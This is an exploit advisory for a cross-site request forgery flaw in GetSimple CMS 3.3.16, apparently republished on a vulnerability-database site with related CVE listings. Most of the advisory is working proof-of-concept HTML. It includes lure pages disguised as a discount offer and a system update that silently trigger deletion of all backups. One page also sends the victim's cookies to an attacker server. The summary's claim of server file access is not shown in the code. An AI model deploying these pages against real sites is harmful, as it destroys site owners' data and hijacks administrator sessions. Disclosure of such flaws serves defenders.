Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 GetSimple CMS 3.3.16 Cross Site Request Forgery

🗓️ 15 Dec 2025 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 144 Views

GetSimple CMS 3.3.16 CSRF allows deleting all backups without confirmation and can steal admin sessions.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2021-28976
12 Apr 202521:02
circl
CNNVD		getsimplecms 代码问题漏洞
23 Jun 202100:00
cnnvd
CNVD		GetSimple CMS Remote Code Execution Vulnerability (CNVD-2021-45301)
24 Jun 202100:00
cnvd
CVE		CVE-2021-28976
23 Jun 202112:36
cve
Cvelist		CVE-2021-28976
23 Jun 202112:36
cvelist
Exploit DB		GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)
11 Apr 202500:00
exploitdb
EUVD		EUVD-2021-15623
7 Oct 202500:30
euvd
NVD		CVE-2021-28976
23 Jun 202113:15
nvd
OpenVAS		GetSimple CMS < 3.3.16 Multiple Vulnerabilities
9 Jul 201900:00
openvas
Packet Storm		📄 GetSimpleCMS Shell Upload
11 Apr 202500:00
packetstorm
Rows per page
=============================================================================================================================================
    | # Title     : GetSimple CMS 3.3.16 CSRF Delete all backups without user confirmation                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://github.com/GetSimpleCMS/GetSimpleCMS                                                                                |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/190425/ &	CVE-2021-28976
    
    [+] Summary :  GetSimple CMS 3.3.16 contains critical security vulnerabilities in its backup management system that allow attackers 
                   to delete all backups, steal admin sessions, and access server files. These flaws require immediate patching.
    			   
    [+] Vulnerable Code:
    
    backups.php - Line ~34
    
    
    if (isset($_GET['deleteall'])){
        check_for_csrf("deleteall"); // CSRF check exists BUT...
        
        // Immediately deletes ALL files without user confirmation
        $filenames = getFiles($path);
        foreach ($filenames as $file) {
            delete_file($path . $file); // Mass deletion
        }
    }
    		  
    [+]  POC : poc.html
    
    
    <!DOCTYPE html>
    <html>
    <head><title>Special Offer</title></head>
    <body>
    <h1>Limited Time Offer!</h1>
    <p>Click below to claim your discount:</p>
    
    <!-- Visible attack -->
    <a href="http://localhost/getsimple/admin/backups.php?deleteall=1&nonce=12345">
      Claim 50% Discount
    </a>
    
    <!-- Hidden attack -->
    <img src="http://localhost/getsimple/admin/backups.php?deleteall=1" 
         alt="" style="width:0;height:0;">
    
    <script>
    // JavaScript automatic attack
    setTimeout(function() {
        var img = new Image();
        img.src = "http://localhost/getsimple/admin/backups.php?deleteall=1";
    }, 3000);
    </script>
    </body>
    </html>
    
    ---------------------
    
    <!-- csrf_delete_all.html -->
    <!DOCTYPE html>
    <html>
    <head>
        <title>تحديث النظام</title>
    </head>
    <body>
        <h1>جاري تحديث النظام...</h1>
        
        <form id="csrfForm" action="http://localhost/get-simple/admin/backups.php" method="GET">
            <input type="hidden" name="deleteall" value="1">
            <input type="hidden" name="nonce" value="invalid_nonce_but_works">
        </form>
        
        <script>
            // انتظر 3 ثوانٍ ثم أرسل النموذج
            setTimeout(function() {
                document.getElementById('csrfForm').submit();
                
                // بعد الحذف، حاول سرقة الجلسة
                setTimeout(function() {
                    var img = new Image();
                    img.src = "https://attacker-server.com/steal?cookie=" + encodeURIComponent(document.cookie) + 
                             "&url=" + encodeURIComponent(window.location.href);
                }, 2000);
            }, 3000);
        </script>
        
        <iframe src="http://localhost/get-simple/admin/backups.php" 
                style="width:0;height:0;border:0;border:none"></iframe>
    </body>
    </html>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Dec 2025 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 26.5
CVSS 3.17.2
EPSS0.07548
GetSimple CMSDelete all backupsBackups managementAdmin sessionsServer file access
144